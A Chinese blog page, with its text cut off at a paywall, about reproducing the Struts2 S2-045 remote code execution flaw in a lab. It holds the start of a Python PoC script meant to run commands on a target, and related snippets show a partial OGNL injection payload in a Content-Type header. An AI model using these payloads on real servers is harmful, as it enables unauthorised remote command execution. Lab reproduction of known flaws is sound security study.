S2-045之搬码工复现(含调整后能用的poc代码)

最新推荐文章于 2021-05-16 13:11:47 发布
最新推荐文章于 2021-05-16 13:11:47 发布
阅读量1k 收藏
点赞数
文章标签: S2-045 poc poc.exe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/manic_pfy/article/details/99630625
版权

S2-045复现(含调整能用的poc代码)

概述

写这篇文是因为在系统维护过程,发现安全系统拦截到了这个漏洞。但是网上教程大都简单描述,要不然就是照搬i春秋实验的过程,对于搬码工的我来说,CV操作用不了的,是真的看不懂好吗?i春秋的环境中的文件又不能拷贝出来,你们那些文中还照搬下载的地址,你们真的有去做实验吗?胡乱就发一篇文出来,也不管是不是有用。

S2-045官方解释

Possible Remote Code Execution when performing file upload based on Jakarta Multipart parser. It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn’t valid an exception is thrown which is then used to display an error message to a user.

意思就是说基于Jakarta Multipart解析器执行文件上传时的远程执行代码,可以利用恶意更改请求头中的Content-Type内容,进而执行远程命令代码。

复现过程

实验环境

windows python 2.7

Struts项目搭建版本需求

需要有服务器搭建一个Struts2.3.5 - Struts2.3.31 或者 2.5-2.5.10这些版本的web项目,局域网中用两台机子去搭应该也可以,自己搭一个,网上教程大把,不在这里赘述。

漏洞复现

脚本代码

利用poc远程执行命令ipconfig,poc.py代码从i春秋的实验中拉取下来的,

#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers

def poc():    
    if len(sys.argv) < 3:
        print('''Usage: poc.py http://172.16.12.2/example/HelloWorld.action "command"''')
        sys.exit()
    register_openers()
    # opan("请求的文件", "打开方式")
    datagen, header = multipart_encode({
   "image": open("zenicon.eot"
最低0.47元/天 解锁文章
老飞pfy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Struts2 漏洞复现s2-045
weixin_51220765的博客
12-14 2697
Struts2 漏洞复现s2-045 原理: 在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 影响版本: Struts 2.3.5 - Struts 2.3.31 Struts 2.5 - Struts 2.5.10 1.进入045 cd vulhub-master/struts2/s2-045 2.开启045 docker-compose up -d
复现S2-045远程代码执行漏洞
DXfighting_的博客
04-15 1565
使用docker启动环境 访问 使用burpsuite抓包修改如图请求包,验证漏洞
struts2 s2-045漏洞利用poc
isinstance的博客
03-10 6742
直接上代码了亲测有用 第一个是检测有没有这个漏洞的 import requestsimport sys def poc(url): payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#con
Struts2爆远程代码执行漏洞(S2-045),附POC
weixin_33755847的博客
09-20 924
本文讲的是Struts2爆远程代码执行漏洞(S2-045),附POC, 今天凌晨,安全研究员Nike Zheng在Struts2上发现一个高危漏洞(漏洞编号为CVE-2017-5638),当基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行。 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个serv...
管道无损检测python_s2-045 无损检测 PoC 分享
weixin_39917291的博客
12-30 242
这次的POC由网上公开的EXP修改而来,主要是由于该EXP具有一定的攻击性,所以我们做了一个无损检测的修改,。附上无损检测POC:#! /usr/bin/env python#coding: utf-8import requestsimport sysheader = dict()header['Content-Type'] = '%{(#nike='multipart/form-data').(...
Struts2-045漏洞利用工具
08-11
Struts2-045漏洞利用工具
linux struts2漏洞,重大漏洞预警:Struts 2 远程代码执行漏洞(s2-045\s2-046) (PoC)
weixin_39612677的博客
05-16 451
背景介绍近日,安全研究人员发现著名J2EE框架——Struts2存在远程代码执行的漏洞,Struts2官方已经确认该漏洞(S2-045,S2-046),并定级为高危漏洞。Struts2的使用范围及其广泛,国内外均有大量厂商使用该框架。Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立...
s2-045 java_Struts2爆远程代码执行漏洞(S2-045),附POC | 极安全-JiSec
weixin_36265390的博客
02-12 265
今天凌晨,安全研究员Nike Zheng在Struts2上发现一个高危漏洞(漏洞编号为CVE-2017-5638),当基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行。Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2...
漏洞分析马后炮 s2-045漏洞分析
全栈纸伞
03-09 2789
漏洞分析马后炮 s2-045漏洞分析本文包如下内容:0x00 目录漏洞分析马后炮 s2-045漏洞分析 0x00 目录 0x01 环境搭建 0x02 PoC分析 0x03 代码DEBUG evaluate0x01 环境搭建现成的符合版本要求的弱环境下载: https://raw.githubusercontent.com/mottoin/S2-045/master/S2-045.war 0x0
S2-045漏洞之简单分析+实战
BlingSmile的博客
04-12 1万+
0X00 前言:尽管s2-045poc已经烂大街了,博主只是想学习了解一下它的用法,顺带写了一个测试小工具。0x01 漏洞简介Apache Struts是一套用于创建企业级Java Web 应用的开源MVC框架 。 Apache Struts 2.3.5 – 2.3.31版本及2.5 – 2.5.10版本存在远程代码执行漏洞(CNNVD-201703-152 ,CVE-2017-5638)。该漏
s2-045漏洞分析
Exploit的小站~
05-10 1万+
这个分析写的我有点汗颜,强烈建议抵制struts2,改为更加可靠的SpringMVC。 背景是,Struts2默认处理multipart报文的解析器是jakarta,是这个组件出现了问题。 该组件定义在了struts-default.xml中,因此,只要不修改parser,并且版本在受影响范围内,肯定是有问题的。 令我非常疑惑的是,一个content-type怎么就能用ognl解析...
S2-045本地复现与分析
Au
02-15 3532
环境搭建:win10 eclipes ee struts2.3.20 tomcat8 搭建好的环境: 链接:https://pan.baidu.com/s/1mChEMcWRlKALdu9Ikce8OQ 提取码:uisj 漏洞构造条件只需模拟Struts2上传发包即可,所以我简单写了个登录校验来复现此漏洞 导入基础jar包放置在项目lib目录下 web.xml ...
S2-045S2-046
weixin_30241919的博客
05-05 435
前言 S2-045依然是一个Ognl表达式注入导致的RCE漏洞,且漏洞很严重。另外,还是建议读者阅读本篇文章前先看下系列文章的第一篇。 正文 依然是第一篇文章中讲过,StrutsPrepareFilter的doFilter方法中,在获取action mapper前会对HttpServletRequest做一次封装。 跟进该方法内: 可以看到在...
ST2-045 For POC
热门推荐
龙哥盟
03-18 3万+
转载请注明: 转载自Legend‘s BLog 本文链接地址: ST2-045 For POC 利用方法:#! /usr/bin/env python # encoding:utf-8 import urllib2 import sys from poster.encode import multipart_encode from poster.streaminghttp import r
CVE-2022-33891复现poc
最新发布
09-07
很抱歉,由于我是一个AI...要复现POC,您可能需要查找相关的漏洞报告、安全公告或其他资源,以获取必要的代码和指导。请记住,在进行任何安全研究和测试之前,务必遵循适当的法律和道德标准,并获得相关授权和许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值